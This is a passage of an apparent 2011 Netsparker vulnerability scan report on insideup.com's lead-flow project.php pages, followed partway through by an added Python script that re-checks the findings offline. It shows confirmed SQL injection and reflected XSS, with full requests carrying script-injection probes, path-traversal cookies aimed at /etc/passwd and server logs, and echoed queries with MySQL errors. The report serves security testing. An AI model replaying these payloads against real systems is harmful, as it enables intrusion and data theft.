sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='"--></style></script><script>netsparker(0x0005B2)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B2)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005B4)</script>

Request

GET /ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005B4)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3h7rvl03g0q4g3ohabkik7jn12; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join 
sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005B4)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B4)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%22--%3E%3C/style%3E%3C/..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET '"--></style></script><script>alert(0x0005B3)</script>

Request

GET /ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005B3)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=u5v9s4nuqagjdfs0joav6rqn24; path=/
Content-Length: 3263
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='"--></style></script><script>netsparker(0x0005B3)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B3)</script>/' union select prj.catI' at line 5
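Offline re-check of the three confirmed project.php findings above (iusrc on lgds00 and phsy00, nsextt on meac00). This is an added example, not Netsparker output and not code from the scanned site; the two request lines are copied from the report, but the response bodies it inspects are constructed to the shape of the captured ones (the echoed SQL, then the MySQL error text) rather than copied verbatim. What it makes explicit: the decoded query string of each request sits inside the quoted project_page_url literal of the echoed query, so the SQL is built from the raw request URI, which is why nsextt, a parameter project.php does not otherwise use, still reaches MySQL; and the same probe comes back with its angle brackets and quotes intact in a text/html response, so one request/response pair evidences both CWE-89 and CWE-79.

```python
"""Offline re-check of the project.php findings above.  Added example: not
Netsparker output and not code from the scanned site.  The response bodies are
constructed to the shape of the report's responses (echoed query followed by
the MySQL error text), not the captured ones."""
import re
from urllib.parse import unquote

# Probe exactly as it appears URL-encoded in the request lines above.
PROBE_ENC = "'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker({m})%3C/script%3E"

# Request lines copied from the report.  The second injects nsextt, a
# parameter project.php does not otherwise use.
REQUESTS = {
    "lgds00": "GET /ppc/leadflow/lgds00/project.php?catId=80005&iusrc="
              + PROBE_ENC.format(m="0x0005B2") + " HTTP/1.1",
    "meac00": "GET /ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc&nsextt="
              + PROBE_ENC.format(m="0x0005B4") + " HTTP/1.1",
}

MYSQL_SYNTAX_ERROR = re.compile(
    r"You have an error in your SQL syntax;.*?to use near '(?P<near>.*?)' at line (?P<line>\d+)",
    re.S,
)


def query_string(request_line: str) -> str:
    """Decoded query string of a 'GET <target> HTTP/1.1' request line."""
    target = request_line.split(" ", 2)[1]
    return unquote(target.partition("?")[2])


def constructed_body(page: str, request_line: str, marker: str) -> str:
    """Constructed body in the shape of the report's responses: the SQL is
    echoed with the decoded request URI inside the project_page_url literal,
    then MySQL's error.  The 'near' excerpt follows the wording in the report."""
    lit = f"leadflow/{page}/project.php?{query_string(request_line)}"
    return (
        "select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url "
        f"from lead_flow_one_pages_details prj where prj.project_page_url = '{lit}' "
        f"OR prj.project_page_url = '{lit}/' union select prj.catId,prj.groupId "
        "from lead_flow_two_pages_details prj"
        "You have an error in your SQL syntax; check the manual that corresponds to "
        "your MySQL server version for the right syntax to use near '></style></script>"
        f"<script>netsparker({marker})</script>/' union select prj.catI' at line 5"
    )


def sql_error_disclosed(body: str):
    """(near_text, line) if a verbose MySQL syntax error is in the body, else None."""
    m = MYSQL_SYNTAX_ERROR.search(body)
    return None if m is None else (m.group("near"), int(m.group("line")))


def probe_reflected_raw(body: str, request_line: str) -> bool:
    """True when the decoded probe (last query parameter) is echoed with its
    angle brackets and quotes intact.  In a text/html response that is a
    reflected XSS, not merely an error leak."""
    probe = query_string(request_line).split("&")[-1].partition("=")[2]
    return probe in body


def request_uri_in_sql_literal(body: str, request_line: str) -> bool:
    """True when the whole decoded query string sits inside the quoted
    project_page_url literal, i.e. the SQL is built from the request URI."""
    m = re.search(r"project_page_url = '(.*?)' OR ", body)
    return m is not None and query_string(request_line) in m.group(1)


def classify(body: str, request_line: str) -> dict:
    """Summarise what one request/response pair evidences."""
    err = sql_error_disclosed(body)
    return {
        "sql_injection": err is not None and request_uri_in_sql_literal(body, request_line),
        "reflected_xss": probe_reflected_raw(body, request_line),
        "mysql_error_line": None if err is None else err[1],
    }


if __name__ == "__main__":
    for page, marker in (("lgds00", "0x0005B2"), ("meac00", "0x0005B4")):
        body = constructed_body(page, REQUESTS[page], marker)
        print(page, classify(body, REQUESTS[page]))
```

To run this against live responses instead of the constructed ones, pass the raw body of each 200 text/html response to classify() together with the request line from the report; a fixed application would give sql_injection False (no echoed query, no MySQL error) and reflected_xss False (the probe HTML-encoded or absent).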
- /ppc/leadflow/meac00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005B7)%3C/script%3E

/ppc/leadflow/meac00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005B7)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005B7)</script>

Request

GET /ppc/leadflow/meac00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005B7)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 